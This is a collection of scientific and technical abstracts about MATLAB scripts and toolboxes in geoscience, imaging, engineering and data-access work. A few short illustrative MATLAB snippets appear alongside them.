The Generic Mapping Tools (GMT) is a widely used software infrastructure tool set for analyzing and displaying geoscience data. Its power to analyze and process data and produce publication-quality graphics has made it one of several standard processing toolsets used by a large segment of the Earth and Ocean Sciences. GMT's strengths lie in superior publication-quality vector graphics, geodetic-quality map projections, robust data processing algorithms scalable to enormous data sets, and ability to run under all common operating systems. The GMT tool chest offers over 120 modules sharing a common set of command options, file structures, and documentation. GMT modules are command line tools that accept input and write output, and this design allows users to write scripts in which one module's output becomes another module's input, creating highly customized GMT workflows. With the release of GMT 5, these modules are high-level functions with a C API, potentially allowing users access to high-level GMT capabilities from any programmable environment. Many scientists who use GMT also use other computational tools, such as MATLAB® and its clone Octave. We have built a MATLAB/Octave interface on top of the GMT 5 C API. Thus, MATLAB or Octave now has full access to all GMT modules as well as fundamental input/output of GMT data objects via a MEX function. Internally, the GMT/MATLAB C API defines six high-level composite data objects that handle input and output of data via individual GMT modules. These are data tables, grids, text tables (text/data mixed records), color palette tables, raster images (1-4 color bands), and PostScript. The API is responsible for translating between the six GMT objects and the corresponding native MATLAB objects. References to data arrays are passed if transposing of matrices is not required. The GMT and MATLAB/Octave combination is extremely flexible, letting the user harvest the general numerical and graphical capabilities of both systems, and represents a giant step forward in interoperability between GMT and other software packages. We will present examples of the symbiotic benefits of combining these platforms. Two other extensions are also in the works: a nearly finished Julia wrapper and an embryonic Python module. Publication supported by FCT- project UID/GEO/50019/2013 - Instituto D. Luiz
Piezoelectric Actuator Modeling Using MSC/NASTRAN and MATLAB
NASA Technical Reports Server (NTRS)
Reaves, Mercedes C.; Horta, Lucas G.
2003-01-01
This paper presents a procedure for modeling structures containing piezoelectric actuators using MSC/NASTRAN and MATLAB. The paper describes the utility and functionality of one set of validated modeling tools. The tools described herein use MSC/NASTRAN to model the structure with piezoelectric actuators and a thermally induced strain to model straining of the actuators due to an applied voltage field. MATLAB scripts are used to assemble the dynamic equations and to generate frequency response functions. The application of these tools is discussed using a cantilever aluminum beam with a surface mounted piezoelectric actuator as a sample problem. Software in the form of MSC/NASTRAN DMAP input commands, MATLAB scripts, and a step-by-step procedure to solve the example problem are provided. Analysis results are generated in terms of frequency response functions from deflection and strain data as a function of input voltage to the actuator.
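As a generic illustration of the frequency-response assembly step (standard modal superposition with assumed variable names, not the scripts distributed with the paper):

    % phi:  mass-normalized mode shapes (n_dof x n_modes) from the finite element model;
    % wn:   natural frequencies (rad/s); zeta: modal damping ratios;
    % i_in, i_out: degrees of freedom of the actuator input and the response output.
    w = 2*pi*linspace(0.1, 200, 1000);                  % frequency axis, rad/s
    H = zeros(size(w));
    for k = 1:numel(wn)
        H = H + (phi(i_out,k) * phi(i_in,k)) ./ ...
                (wn(k)^2 - w.^2 + 2i*zeta(k)*wn(k)*w);  % modal contribution to the FRF
    end
    semilogy(w/(2*pi), abs(H)); xlabel('Frequency (Hz)'); ylabel('|FRF|');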
DOE Office of Scientific and Technical Information (OSTI.GOV)
Haas, Nicholas Q; Gillen, Robert E; Karnowski, Thomas P
MathWorks' MATLAB is widely used in academia and industry for prototyping, data analysis, data processing, etc. Many users compile their programs using the MATLAB Compiler to run on workstations/computing clusters via the free MATLAB Compiler Runtime (MCR). The MCR facilitates the execution of code calling Application Programming Interface (API) functions from both base MATLAB and MATLAB toolboxes. In a Linux environment, a sizable number of third-party runtime dependencies (i.e. shared libraries) are necessary. Unfortunately, to the MATLAB community's knowledge, these dependencies are not documented, leaving system administrators and/or end users to find and install the necessary libraries, either in response to runtime errors resulting from their absence or by inspecting the header information of Executable and Linkable Format (ELF) libraries of the MCR to determine which ones are missing from the system. To address these shortcomings, Docker images based on Community Enterprise Operating System (CentOS) 7, a derivative of Red Hat Enterprise Linux (RHEL) 7, containing recent (2015-2017) MCR releases and their dependencies were created. These images, along with a provided sample Docker Compose YAML script, can be used to create a simulated computing cluster where binaries created by the MATLAB Compiler can be executed using a sample Slurm Workload Manager script.
Developing Matlab scripts for image analysis and quality assessment
NASA Astrophysics Data System (ADS)
Vaiopoulos, A. D.
2011-11-01
Image processing is a very helpful tool in many fields of modern science that involve digital imaging examination and interpretation. Processed images, however, often need to be correlated with the original image in order to ensure that the resulting image fulfills its purpose. Aside from the visual examination, which is mandatory, image quality indices (such as correlation coefficient, entropy, and others) are very useful when deciding which processed image is the most satisfactory. For this reason, a single program (script) was written in the Matlab language, which automatically calculates eight indices by utilizing eight respective functions (independent function scripts). The program was tested on both fused hyperspectral (Hyperion-ALI) and multispectral (ALI, Landsat) imagery and proved to be efficient. The indices were found to be in agreement with visual examination and statistical observations.
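Two of the indices mentioned, the correlation coefficient and the entropy, can be computed in a few lines of base MATLAB (a sketch; A is the original band and B the processed band, both assumed to be 8-bit images of the same size):

    a  = double(A(:));  b = double(B(:));
    cc = sum((a - mean(a)).*(b - mean(b))) / ...
         sqrt(sum((a - mean(a)).^2) * sum((b - mean(b)).^2));   % correlation coefficient
    counts = histcounts(B(:), 0:256);                           % 256-bin histogram of the processed band
    pk = counts(counts > 0) / sum(counts);
    H  = -sum(pk .* log2(pk));                                  % Shannon entropy in bits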
Development of MATLAB Scripts for the Calculation of Thermal Manikin Regional Resistance Values
2016-01-01
[Extraction fragments of the report's cover page, disclaimer, and abstract: USARIEM Technical Note TN16-1, "Development of MATLAB® Scripts for the Calculation of Thermal Manikin Regional Resistance Values"; the recoverable abstract text notes work performed by thermal manikin and modeling personnel, and that steps to operate the scripts, as well as the underlying calculations, are outlined in detail.]
Michael Swyer
2015-02-05
Matlab scripts/functions and data used to build Poly3D models and create permeability potential GIS layers for 1) Mount St. Helens, 2) Wind River Valley, and 3) Mount Baker geothermal prospect areas located in Washington state.
Earth Science Curriculum Enrichment Through Matlab!
NASA Astrophysics Data System (ADS)
Salmun, H.; Buonaiuto, F. S.
2016-12-01
The use of Matlab in Earth Science undergraduate courses in the Department of Geography at Hunter College began as a pilot project in Fall 2008 and has evolved into a significant component of an Advanced Oceanography course, the selected tool for data analysis in other courses, and the main focus of a graduate course for doctoral students at The City University of New York (CUNY) working on research related to geophysical, oceanic, and atmospheric dynamics. The primary objectives of these efforts were to enhance the Earth Science curriculum through course-specific applications, to increase undergraduate programming and data analysis skills, and to develop a Matlab users network within the Department and the broader Hunter College and CUNY community. Students have had the opportunity to learn Matlab as a stand-alone course, within an independent study group, or as a laboratory component within related STEM classes. All of these instructional efforts incorporated the use of prepackaged Matlab exercises and a research project. Initial exercises were designed to cover basic scripting and data visualization techniques. Students were provided data and a skeleton script to modify and improve upon based on the laboratory instructions. As students' programming skills increased throughout the semester, more advanced scripting, data mining, and data analysis were assigned. In order to illustrate the range of applications within the Earth Sciences, laboratory exercises were constructed around topics selected from the disciplines of Geology, Physics, Oceanography, Meteorology, and Climatology. In addition, the research component of the courses included both individual and team projects.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Plimpton, Steve; Jones, Matt; Crozier, Paul
2006-01-01
Pizza.py is a loosely integrated collection of tools, many of which provide support for the LAMMPS molecular dynamics and ChemCell cell modeling packages. There are tools to create input files, convert between file formats, process log and dump files, create plots, and visualize and animate simulation snapshots. Software packages that are wrapped by Pizza.py, so they can be invoked from within Python, include GnuPlot, MatLab, Raster3D, and RasMol. Pizza.py is written in Python and runs on any platform that supports Python. Pizza.py enhances the standard Python interpreter in a few simple ways. Its tools are Python modules which can be invoked interactively, from scripts, or from GUIs when appropriate. Some of the tools require additional Python packages to be installed as part of the user's Python. Others are wrappers around software packages (as listed above) which must be available on the user's system. It is easy to modify or extend Pizza.py with new functionality or new tools, which need not have anything to do with LAMMPS or ChemCell.
Complete scanpaths analysis toolbox.
Augustyniak, Piotr; Mikrut, Zbigniew
2006-01-01
This paper presents a complete open software environment for the control, data processing, and assessment of visual experiments. Visual experiments are widely used in research on human perception physiology, and the results are applicable to various visual-information-based man-machine interfaces, human-emulated automatic visual systems, and scanpath-based learning of perceptual habits. The toolbox is designed for the Matlab platform and supports an infrared reflection-based eye tracker in calibration and scanpath analysis modes. Toolbox procedures are organized in three layers: the lower one communicating with the eye tracker output file, the middle one detecting scanpath events on a physiological background, and the upper one consisting of experiment schedule scripts, statistics, and summaries. Several examples of visual experiments carried out with use of the presented toolbox complete the paper.
LAMDA programmer's manual [Final report, Part 1]
DOE Office of Scientific and Technical Information (OSTI.GOV)
Hughes, T.P.; Clark, R.M.; Mostrom, M.A.
This report discusses the following topics on the LAMDA program: General maintenance; CTSS FCL script; DOS batch files; Macintosh MPW scripts; UNICOS FCL script; VAX/MS command file; LINC calling tree; and LAMDA calling tree.
Patrick, Matthew R.; Kauahikaua, James P.; Antolik, Loren
2010-01-01
Webcams are now standard tools for volcano monitoring and are used at observatories in Alaska, the Cascades, Kamchatka, Hawai'i, Italy, and Japan, among other locations. Webcam images allow invaluable documentation of activity and provide a powerful comparative tool for interpreting other monitoring datastreams, such as seismicity and deformation. Automated image processing can improve the time efficiency and rigor of Webcam image interpretation, and potentially extract more information on eruptive activity. For instance, Lovick and others (2008) provided a suite of processing tools that performed such tasks as noise reduction, eliminating uninteresting images from an image collection, and detecting incandescence, with an application to dome activity at Mount St. Helens during 2007. In this paper, we present two very simple automated approaches for improved characterization and quantification of volcanic incandescence in Webcam images at Kilauea Volcano, Hawai'i. The techniques are implemented in MATLAB (version 2009b, Copyright: The Mathworks, Inc.) to take advantage of the ease of matrix operations. Incandescence is a useful indicator of the location and extent of active lava flows and also a potentially powerful proxy for activity levels at open vents. We apply our techniques to a period covering both summit and east rift zone activity at Kilauea during 2008-2009 and compare the results to complementary datasets (seismicity, tilt) to demonstrate their integrative potential. A great strength of this study is the demonstrated success of these tools in an operational setting at the Hawaiian Volcano Observatory (HVO) over the course of more than a year. Although applied only to Webcam images here, the techniques could be applied to any type of sequential images, such as time-lapse photography. We expect that these tools are applicable to many other volcano monitoring scenarios, and the two MATLAB scripts, as they are implemented at HVO, are included in the appendixes. These scripts would require minor to moderate modifications for use elsewhere, primarily to customize directory navigation. If the user has some familiarity with MATLAB, or programming in general, these modifications should be easy. Although we originally anticipated needing the Image Processing Toolbox, the scripts in the appendixes do not require it. Thus, only the base installation of MATLAB is needed. Because fairly basic MATLAB functions are used, we expect that the scripts can be run successfully by versions earlier than 2009b.
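A minimal sketch of the kind of automated incandescence detection described (the thresholds and file name are illustrative; the HVO scripts in the appendixes are considerably more complete):

    img = imread('webcam_frame.jpg');                    % RGB Webcam image
    r = double(img(:,:,1)); g = double(img(:,:,2)); b = double(img(:,:,3));
    glow  = (r > 200) & (r > 1.5*g) & (r > 1.5*b);       % bright, red-dominated pixels
    nGlow = nnz(glow);                                   % number of incandescent pixels
    fprintf('%s: %d incandescent pixels (%.2f%% of frame)\n', ...
            datestr(now), nGlow, 100*nGlow/numel(glow));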
Tools for Integrating Data Access from the IRIS DMC into Research Workflows
NASA Astrophysics Data System (ADS)
Reyes, C. G.; Suleiman, Y. Y.; Trabant, C.; Karstens, R.; Weertman, B. R.
2012-12-01
Web service interfaces at the IRIS Data Management Center (DMC) provide access to a vast archive of seismological and related geophysical data. These interfaces are designed to easily incorporate data access into data processing workflows. Examples of data that may be accessed include: time series data, related metadata, and earthquake information. The DMC has developed command line scripts, MATLAB® interfaces and a Java library to support a wide variety of data access needs. Users of these interfaces do not need to concern themselves with web service details, networking, or even (in most cases) data conversion. Fetch scripts allow access to the DMC archive and are a comfortable fit for command line users. These scripts are written in Perl and are well suited for automation and integration into existing workflows on most operating systems. For metadata and event information, the Fetch scripts even parse the returned data into simple text summaries. The IRIS Java Web Services Library (IRIS-WS Library) allows Java developers the ability to create programs that access the DMC archives seamlessly. By returning the data and information as native Java objects the Library insulates the developer from data formats, network programming and web service details. The MATLAB interfaces leverage this library to allow users access to the DMC archive directly from within MATLAB (r2009b or newer), returning data into variables for immediate use. Data users and research groups are developing other toolkits that use the DMC's web services. Notably, the ObsPy framework developed at LMU Munich is a Python Toolbox that allows seamless access to data and information via the DMC services. Another example is the MATLAB-based GISMO and Waveform Suite developments that can now access data via web services. In summary, there now exist a host of ways that researchers can bring IRIS DMC data directly into their workflows. MATLAB users can use irisFetch.m, command line users can use the various Fetch scripts, Java users can use the IRIS-WS library, and Python users may request data through ObsPy. To learn more about any of these clients see http://www.iris.edu/ws/wsclients/.
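For example, a waveform request through irisFetch.m takes roughly the following form from within MATLAB (the station and time window are only illustrative, and the argument order and returned field names should be checked against the current irisFetch documentation):

    traces = irisFetch.Traces('IU', 'ANMO', '00', 'BHZ', ...
                              '2012-01-01 00:00:00', '2012-01-01 01:00:00');
    plot(traces(1).data);                                % raw samples of the first returned trace
    title(sprintf('%s.%s %s', traces(1).network, traces(1).station, traces(1).channel));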
EQS Goes R: Simulations for SEM Using the Package REQS
ERIC Educational Resources Information Center
Mair, Patrick; Wu, Eric; Bentler, Peter M.
2010-01-01
The REQS package is an interface between the R environment of statistical computing and the EQS software for structural equation modeling. The package consists of 3 main functions that read EQS script files and import the results into R, call EQS script files from R, and run EQS script files from R and import the results after EQS computations.…
A Simple Modeling Tool and Exercises for Incoming Solar Radiation Demonstrations
ERIC Educational Resources Information Center
Werts, Scott; Hinnov, Linda
2011-01-01
We present a MATLAB script INSOLATE.m that calculates insolation at the top of the atmosphere and the total amount of daylight during the year (and other quantities) with respect to geographic latitude and Earth's obliquity (axial tilt). The script output displays insolation values for an entire year on a three-dimensional graph. This tool…
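The core of such a script is the standard daily-mean insolation formula; a sketch for a single day and latitude (the solar constant, the crude declination approximation, and the neglect of the Sun-Earth distance factor are all simplifying assumptions, and INSOLATE.m itself may organize the calculation differently):

    S0  = 1361;                                         % solar constant, W/m^2 (assumed value)
    phi = 45*pi/180;                                    % geographic latitude (radians)
    doy = 172;                                          % day of year (near the June solstice)
    dec = (23.44*pi/180) * sin(2*pi*(doy - 80)/365);    % crude solar declination
    h0  = acos(max(-1, min(1, -tan(phi)*tan(dec))));    % sunrise hour angle
    Q   = (S0/pi) * (h0*sin(phi)*sin(dec) + cos(phi)*cos(dec)*sin(h0));  % daily-mean TOA insolation, W/m^2
    daylight_hours = 24*h0/pi;                          % hours of daylight at this latitude and day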
ImageJ-MATLAB: a bidirectional framework for scientific image analysis interoperability.
Hiner, Mark C; Rueden, Curtis T; Eliceiri, Kevin W
2017-02-15
ImageJ-MATLAB is a lightweight Java library facilitating bi-directional interoperability between MATLAB and ImageJ. By defining a standard for translation between matrix and image data structures, researchers are empowered to select the best tool for their image-analysis tasks. Freely available extension to ImageJ2 (http://imagej.net/Downloads). Installation and use instructions available at http://imagej.net/MATLAB_Scripting. Tested with ImageJ 2.0.0-rc-54, Java 1.8.0_66 and MATLAB R2015b. eliceiri@wisc.edu. Supplementary data are available at Bioinformatics online. © The Author 2016. Published by Oxford University Press. All rights reserved. For Permissions, please e-mail: journals.permissions@oup.com
DOE Office of Scientific and Technical Information (OSTI.GOV)
Myronakis, M; Cai, W; Dhou, S
Purpose: To design a comprehensive open-source, publicly available, graphical user interface (GUI) to facilitate the configuration, generation, processing and use of the 4D Extended Cardiac-Torso (XCAT) phantom. Methods: The XCAT phantom includes over 9000 anatomical objects as well as respiratory, cardiac and tumor motion. It is widely used for research studies in medical imaging and radiotherapy. The phantom generation process involves the configuration of a text script to parameterize the geometry, motion, and composition of the whole body and objects within it, and to generate simulated PET or CT images. To avoid the need for manual editing or script writing, our MATLAB-based GUI uses slider controls, drop-down lists, buttons and graphical text input to parameterize and process the phantom. Results: Our GUI can be used to: a) generate parameter files; b) generate the voxelized phantom; c) combine the phantom with a lesion; d) display the phantom; e) produce average and maximum intensity images from the phantom output files; f) incorporate irregular patient breathing patterns; and g) generate DICOM files containing phantom images. The GUI provides local help information using tool-tip strings on the currently selected phantom, minimizing the need for external documentation. The DICOM generation feature is intended to simplify the process of importing the phantom images into radiotherapy treatment planning systems or other clinical software. Conclusion: The GUI simplifies and automates the use of the XCAT phantom for imaging-based research projects in medical imaging or radiotherapy. This has the potential to accelerate research conducted with the XCAT phantom, or to ease the learning curve for new users. This tool does not include the XCAT phantom software itself. We would like to acknowledge funding from MRA, Varian Medical Systems Inc.
TOPPE: A framework for rapid prototyping of MR pulse sequences.
Nielsen, Jon-Fredrik; Noll, Douglas C
2018-06-01
To introduce a framework for rapid prototyping of MR pulse sequences. We propose a simple file format, called "TOPPE", for specifying all details of an MR imaging experiment, such as gradient and radiofrequency waveforms and the complete scan loop. In addition, we provide a TOPPE file "interpreter" for GE scanners, which is a binary executable that loads TOPPE files and executes the sequence on the scanner. We also provide MATLAB scripts for reading and writing TOPPE files and previewing the sequence prior to hardware execution. With this setup, the task of the pulse sequence programmer is reduced to creating TOPPE files, eliminating the need for hardware-specific programming. No sequence-specific compilation is necessary; the interpreter only needs to be compiled once (for every scanner software upgrade). We demonstrate TOPPE in three different applications: k-space mapping, non-Cartesian PRESTO whole-brain dynamic imaging, and myelin mapping in the brain using inhomogeneous magnetization transfer. We successfully implemented and executed the three example sequences. By simply changing the various TOPPE sequence files, a single binary executable (interpreter) was used to execute several different sequences. The TOPPE file format is a complete specification of an MR imaging experiment, based on arbitrary sequences of a (typically small) number of unique modules. Along with the GE interpreter, TOPPE comprises a modular and flexible platform for rapid prototyping of new pulse sequences. Magn Reson Med 79:3128-3134, 2018. © 2017 International Society for Magnetic Resonance in Medicine.
NASA Astrophysics Data System (ADS)
Wessel, Paul; Luis, Joaquim F.
2017-02-01
The GMT/MATLAB toolbox is a basic interface between MATLAB® (or Octave) and GMT, the Generic Mapping Tools, which allows MATLAB users full access to all GMT modules. Data may be passed between the two programs using intermediate MATLAB structures that organize the metadata needed; these are produced when GMT modules are run. In addition, standard MATLAB matrix data can be used directly as input to GMT modules. The toolbox improves interoperability between two widely used tools in the geosciences and extends the capability of both tools: GMT gains access to the powerful computational capabilities of MATLAB while the latter gains the ability to access specialized gridding algorithms and can produce publication-quality PostScript-based illustrations. The toolbox is available on all platforms and may be downloaded from the GMT website.
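A minimal sketch of the interface described above, assuming the toolbox's single gmt() entry point and that modules accept ordinary MATLAB matrices; the module names, region, and grid spacing are illustrative.

% Grid scattered x, y, z data with a GMT module directly from MATLAB.
xyz = [10*rand(50,1), 10*rand(50,1), rand(50,1)];    % synthetic scattered data
G = gmt('surface -R0/10/0/10 -I0.25', xyz);          % returns a MATLAB grid structure
gmt('grdinfo', G);                                   % pass the structure back to GMT

The structure G carries the grid values plus the metadata GMT needs, so it can be handed to further GMT modules or manipulated as a plain MATLAB array.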
Using 3-D Numerical Weather Data in Piloted Simulations
NASA Technical Reports Server (NTRS)
Daniels, Taumi S.
2016-01-01
This report describes the process of acquiring and using 3-D numerical model weather data sets in NASA Langley's Research Flight Deck (RFD). A set of software tools implements the process and can be used for other purposes as well. Given time and location information of a weather phenomenon of interest, the user can download associated numerical weather model data. These data are created by the National Oceanic and Atmospheric Administration (NOAA) High Resolution Rapid Refresh (HRRR) model, and are then processed using a set of Mathworks' Matlab(TradeMark) scripts to create the usable 3-D weather data sets. Each data set includes radar reflectivity, water vapor, component winds, temperature, supercooled liquid water, turbulence, pressure, altitude, land elevation, relative humidity, and water phases. An open-source data processing program, wgrib2, is available from NOAA online, and is used along with Matlab scripts. These scripts are described with sufficient detail to make future modifications. These software tools have been used to generate 3-D weather data for various RFD experiments.
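A minimal sketch of the kind of extraction step involved, assuming wgrib2 is on the system path and an HRRR GRIB2 file has already been downloaded; the file name, field, and level strings are illustrative assumptions.

% Extract one HRRR field to CSV with wgrib2 and load it into MATLAB.
grb = 'hrrr.grib2';                                   % assumed downloaded file
csv = 'tmp2m.csv';
cmd = sprintf('wgrib2 %s -match ":TMP:2 m above ground:" -csv %s', grb, csv);
if system(cmd) ~= 0
    error('wgrib2 failed; check installation and file name.');
end
T = readtable(csv, 'ReadVariableNames', false);       % columns: times, var, level, lon, lat, value
scatter(T.Var5, T.Var6, 8, T.Var7, 'filled');         % quick lon/lat map of the field
colorbar; title('2 m temperature (K)');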
Strategies for Sharing Seismic Data Among Multiple Computer Platforms
NASA Astrophysics Data System (ADS)
Baker, L. M.; Fletcher, J. B.
2001-12-01
Seismic waveform data is readily available from a variety of sources, but it often comes in a distinct, instrument-specific data format. For example, data may be from portable seismographs, such as those made by Refraction Technology or Kinemetrics, from permanent seismograph arrays, such as the USGS Parkfield Dense Array, from public data centers, such as the IRIS Data Center, or from personal communication with other researchers through e-mail or ftp. A computer must be selected to import the data - usually whichever is the most suitable for reading the originating format. However, the computer best suited for a specific analysis may not be the same. When copies of the data are then made for analysis, a proliferation of copies of the same data results, in possibly incompatible, computer-specific formats. In addition, if an error is detected and corrected in one copy, or some other change is made, all the other copies must be updated to preserve their validity. Keeping track of what data is available, where it is located, and which copy is authoritative requires an effort that is easy to neglect. We solve this problem by importing waveform data to a shared network file server that is accessible to all our computers on our campus LAN. We use a Network Appliance file server running Sun's Network File System (NFS) software. Using an NFS client software package on each analysis computer, waveform data can then be read by our MatLab or Fortran applications without first copying the data. Since there is a single copy of the waveform data in a single location, the NFS file system hierarchy provides an implicit complete waveform data catalog and the single copy is inherently authoritative. Another part of our solution is to convert the original data into a blocked-binary format (known historically as USGS DR100 or VFBB format) that is interpreted by MatLab or Fortran library routines available on each computer so that the idiosyncrasies of each machine are not visible to the user. Commercial software packages, such as MatLab, also have the ability to share data in their own formats across multiple computer platforms. Our Fortran applications can create plot files in Adobe PostScript, Illustrator, and Portable Document Format (PDF) formats. Vendor support for reading these files is readily available on multiple computer platforms. We will illustrate by example our strategies for sharing seismic data among our multiple computer platforms, and we will discuss our positive and negative experiences. We will include our solutions for handling the different byte ordering, floating-point formats, and text file ``end-of-line'' conventions on the various computer platforms we use (6 different operating systems on 5 processor architectures).
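As a generic illustration of the byte-ordering point (not the DR100 reader itself), MATLAB's fopen accepts a machine-format argument, so the same binary file can be read with an explicit byte order on any host; the file name, header length, and data type below are assumptions.

% Read big-endian binary waveform data regardless of the native byte order.
fid = fopen('waveform.bin', 'r', 'ieee-be');   % 'ieee-le' for little-endian sources
if fid < 0, error('Cannot open file'); end
hdr     = fread(fid, 64,  'int16');            % assumed 64-value header
samples = fread(fid, inf, 'float32');          % remaining samples
fclose(fid);
plot(samples);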
Karpievitch, Yuliya V; Almeida, Jonas S
2006-01-01
Background Matlab, a powerful and productive language that allows for rapid prototyping, modeling and simulation, is widely used in computational biology. Modeling and simulation of large biological systems often require more computational resources than are available on a single computer. Existing distributed computing environments like the Distributed Computing Toolbox, MatlabMPI, Matlab*G and others allow for the remote (and possibly parallel) execution of Matlab commands with varying support for features like an easy-to-use application programming interface, load-balanced utilization of resources, extensibility over the wide area network, and minimal system administration skill requirements. However, all of these environments require some level of access to participating machines to manually distribute the user-defined libraries that the remote call may invoke. Results mGrid augments the usual process distribution seen in other similar distributed systems by adding facilities for user code distribution. mGrid's client-side interface is an easy-to-use native Matlab toolbox that transparently executes user-defined code on remote machines (i.e. the user is unaware that the code is executing somewhere else). Run-time variables are automatically packed and distributed with the user-defined code and automated load-balancing of remote resources enables smooth concurrent execution. mGrid is an open source environment. Apart from the programming language itself, all other components are also open source, freely available tools: light-weight PHP scripts and the Apache web server. Conclusion Transparent, load-balanced distribution of user-defined Matlab toolboxes and rapid prototyping of many simple parallel applications can now be done with a single easy-to-use Matlab command. Because mGrid utilizes only Matlab, light-weight PHP scripts and the Apache web server, installation and configuration are very simple. Moreover, the web-based infrastructure of mGrid allows for it to be easily extensible over the Internet. PMID:16539707
Karpievitch, Yuliya V; Almeida, Jonas S
2006-03-15
Matlab, a powerful and productive language that allows for rapid prototyping, modeling and simulation, is widely used in computational biology. Modeling and simulation of large biological systems often require more computational resources than are available on a single computer. Existing distributed computing environments like the Distributed Computing Toolbox, MatlabMPI, Matlab*G and others allow for the remote (and possibly parallel) execution of Matlab commands with varying support for features like an easy-to-use application programming interface, load-balanced utilization of resources, extensibility over the wide area network, and minimal system administration skill requirements. However, all of these environments require some level of access to participating machines to manually distribute the user-defined libraries that the remote call may invoke. mGrid augments the usual process distribution seen in other similar distributed systems by adding facilities for user code distribution. mGrid's client-side interface is an easy-to-use native Matlab toolbox that transparently executes user-defined code on remote machines (i.e. the user is unaware that the code is executing somewhere else). Run-time variables are automatically packed and distributed with the user-defined code and automated load-balancing of remote resources enables smooth concurrent execution. mGrid is an open source environment. Apart from the programming language itself, all other components are also open source, freely available tools: light-weight PHP scripts and the Apache web server. Transparent, load-balanced distribution of user-defined Matlab toolboxes and rapid prototyping of many simple parallel applications can now be done with a single easy-to-use Matlab command. Because mGrid utilizes only Matlab, light-weight PHP scripts and the Apache web server, installation and configuration are very simple. Moreover, the web-based infrastructure of mGrid allows for it to be easily extensible over the Internet.
Likelihood Ratio Test Polarimetric SAR Ship Detection Application
2005-12-01
menu. Under the Matlab menu, the user can export an area of an image to the MatlabTM MAT file format, as well as call RGB image and Pauli...must specify various parameters such as the area of the image to analyze. Export Image Area to MatlabTM (PolGASP & COASP) Generates a MatlabTM file...represented by the Minister of National Defence, 2005 (© Sa majesté la reine, représentée par le ministre de la Défense nationale, 2005)
[Discussion to the advanced application of scripting in RayStation TPS system].
Zhang, Jianying; Sun, Jing; Wang, Yun
2014-11-01
In this study, implementation methods for several functions are explored on the RayStation 4.0 platform. Those functions are: passing information such as ROI names to a plan prescription Word file; passing the file to RayStation for plan evaluation; and passing the evaluation result to form an evaluation report file. The results show that RayStation scripts can exchange data with Word, as well as control the running of Word and the content of a Word file. Consequently, it is feasible for scripts to interact with third-party software and to upgrade the performance of RayStation itself.
Kepler Fine Guidance Sensor Data
NASA Technical Reports Server (NTRS)
Van Cleve, Jeffrey; Campbell, Jennifer Roseanna
2017-01-01
The Kepler and K2 missions collected Fine Guidance Sensor (FGS) data in addition to the science data, as discussed in the Kepler Instrument Handbook (KIH, Van Cleve and Caldwell 2016). The FGS CCDs are frame transfer devices (KIH Table 7) located in the corners of the Kepler focal plane (KIH Figure 24), which are read out 10 times every second. The FGS data are being made available to the user community for scientific analysis as flux and centroid time series, along with a limited number of FGS full frame images which may be useful for constructing a World Coordinate System (WCS) or otherwise putting the time series data in context. This document will describe the data content and file format, and give example MATLAB scripts to read the time series. There are three file types delivered as the FGS data: 1. Flux and Centroid (FLC) data: time series of star signal and centroid data. 2. Ancillary FGS Reference (AFR) data: a catalog of information about the observed stars in the FLC data. 3. FGS Full-Frame Image (FGI) data: full-frame image snapshots of the FGS CCDs.
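A minimal reading sketch, assuming the FLC time-series files are FITS binary tables; the file name and column ordering are assumptions, and the actual layout is given in the data release documentation rather than here.

% Read an FGS flux/centroid time series with MATLAB's built-in FITS support.
flc  = 'kplr_fgs_flc_example.fits';      % assumed file name
info = fitsinfo(flc);                    % inspect the HDU layout
tbl  = fitsread(flc, 'binarytable', 1);  % cell array, one cell per table column
t    = tbl{1};                           % assumed: time stamps
flux = tbl{2};                           % assumed: star flux
plot(t, flux); xlabel('Time'); ylabel('FGS flux');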
SolTrace FAQs | Concentrating Solar Power | NREL
NASA Astrophysics Data System (ADS)
Beauducel, François; Bosson, Alexis; Randriamora, Frédéric; Anténor-Habazac, Christian; Lemarchand, Arnaud; Saurel, Jean-Marie; Nercessian, Alexandre; Bouin, Marie-Paule; de Chabalier, Jean-Bernard; Clouard, Valérie
2010-05-01
Seismological and volcanological observatories have common needs, and often common practical problems, in multidisciplinary data monitoring applications. Access to integrated data in real time and estimation of measurement uncertainties are key for efficient interpretation, but the variety of instruments and the heterogeneity of data sampling and acquisition systems lead to difficulties that may hinder crisis management. At the Guadeloupe observatory, we have developed over recent years an operational system that addresses these needs in the context of a multi-instrumental observatory. Based on a single computer server, open source scripts (Matlab, Perl, Bash, Nagios) and a Web interface, the system offers: an extended database for managing networks, stations and sensors (maps, station files with log history, technical characteristics, metadata, photos and associated documents); web-form interfaces for manual data input/editing and export (such as geochemical analyses, some of the deformation measurements, ...); routine data processing with dedicated automatic scripts for each technique, production of validated data outputs, static graphs on preset moving time intervals, and optional e-mail alarms; and automatic status checks of computers, acquisition processes, stations and individual sensors using simple criteria (file updates and signal quality), displayed as synthetic pages for technical control. In the special case of seismology, WebObs includes a digital stripchart multichannel continuous seismogram associated with the EarthWorm acquisition chain (see companion paper Part 1), an event classification database, location scripts, automatic shakemaps, and a regional catalog with associated hypocenter maps accessed through a user request form. The system provides real-time Internet access for integrated monitoring, is a strong support for exchanges between scientists and technicians, and is widely open to interdisciplinary real-time modeling. It has been set up at the Martinique observatory, installation is planned this year at the Montserrat Volcano Observatory, and it is also in production at the geomagnetic observatory of Addis Ababa in Ethiopia.
PSTOOLS - FOUR PROGRAMS THAT INTERPRET/FORMAT POSTSCRIPT FILES
NASA Technical Reports Server (NTRS)
Choi, D.
1994-01-01
PSTOOLS is a package of four programs that operate on files written in the page description language, PostScript. The programs include a PostScript previewer for the IRIS workstation, a PostScript driver for the Matrix QCRZ film recorder, a PostScript driver for the Tektronix 4693D printer, and a PostScript code beautifier that formats PostScript files to be more legible. The three programs PSIRIS, PSMATRIX, and PSTEK are similar in that they all interpret the PostScript language and output the graphical results to a device, and they support color PostScript images. The common code which is shared by these three programs is included as a library of routines. PSPRETTY formats a PostScript file by appropriately indenting procedures and code delimited by "saves" and "restores." PSTOOLS does not use Adobe fonts. PSTOOLS is written in C-language for implementation on SGI IRIS 4D series workstations running IRIX 3.2 or later. A README file and UNIX man pages provide information regarding the installation and use of the PSTOOLS programs. A six-page manual which provides slightly more detailed information may be purchased separately. The standard distribution medium for this package is one .25 inch streaming magnetic tape cartridge in UNIX tar format. PSIRIS (the largest program) requires 1.2Mb of main memory. PSMATRIX requires the "gpib" board (IEEE 488) available from Silicon Graphics. Inc. The programs with graphical interfaces require that the IRIS have at least 24 bit planes. This package was developed in 1990 and updated in 1991. SGI, IRIS 4D, and IRIX are trademarks of Silicon Graphics, Inc. Matrix QCRZ is a registered trademark of the AGFA Group. Tektronix 4693D is a trademark of Tektronix, Inc. Adobe is a trademark of 